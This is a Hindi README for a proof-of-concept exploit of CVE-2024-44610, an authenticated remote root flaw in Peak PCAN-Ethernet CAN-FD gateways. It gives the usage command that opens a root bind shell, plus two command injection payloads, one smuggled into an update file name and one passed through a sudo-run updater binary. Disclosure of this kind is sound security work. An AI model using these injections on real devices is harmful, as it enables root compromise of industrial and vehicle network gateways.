
CVE-2024-44610: Peak PCAN-Ethernet CAN-(FD) गेटवे में प्रमाणीकृत दूरस्थ रूट शोषण
इस रिपॉजिटरी में एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है जिसने पीक ईथरनेट गेटवे पर रूट के रूप में कोड निष्पादित किया। इसके लिए आवश्यक है कि आप वेब इंटरफ़ेस के क्रेडेंशियल जानते हों।
विक्रेता ने तेजी से फिक्स्ड फर्मवेयर प्रदान किया है:
प्रोग्राम को Golang का उपयोग करके संकलित करें और फिर इसे निम्नानुसार चलाएँ:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
यदि शोषण सफल रहा, तो डिवाइस पर रूट के रूप में एक बाइंडशेल शुरू हो जाएगा। आप इस पृष्ठ के नीचे दो स्क्रीनशॉट देख सकते हैं।
विकल्पों का निम्नलिखित अर्थ है:
जबकि गैर-FD संस्करण भी कमजोर है, इसका व्यावहारिक महत्व बहुत कम है क्योंकि ये डिवाइस हस्ताक्षरित फर्मवेयर अपडेट लागू नहीं करते हैं, और इस प्रकार आप आसानी से अपना स्वयं का संशोधित फर्मवेयर अपलोड कर सकते हैं।
दो शेल कमांड इंजेक्शन भेद्यताओं का उपयोग किया गया है:
अपडेट पैकेज के फ़ाइलनाम में एक शेल कमांड शामिल करना संभव है जो वेब इंटरफ़ेस पर अपलोड किया जाता है, उदाहरण के लिए:
test';ping 1.1.1.1;'.raucb
कमांड www-data उपयोगकर्ता के रूप में निष्पादित किया जाएगा, जो वेबसर्वर चलाता है। फ़ाइलनाम में सही एक्सटेंशन होना चाहिए (डिवाइस के आधार पर tar या raucb)
बाइनरी आंतरिक रूप से प्रदान किए गए फ़ाइलनाम पर सिस्टम चलाता है, जब तक वह मौजूद है। इसे निम्नानुसार शोषण किया जा सकता है:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
चूंकि इस बाइनरी को sudo के माध्यम से चलाया जा सकता है, इसलिए रूट के रूप में कमांड निष्पादित करना संभव है।
FD डिवाइस:

गैर-FD डिवाइस:
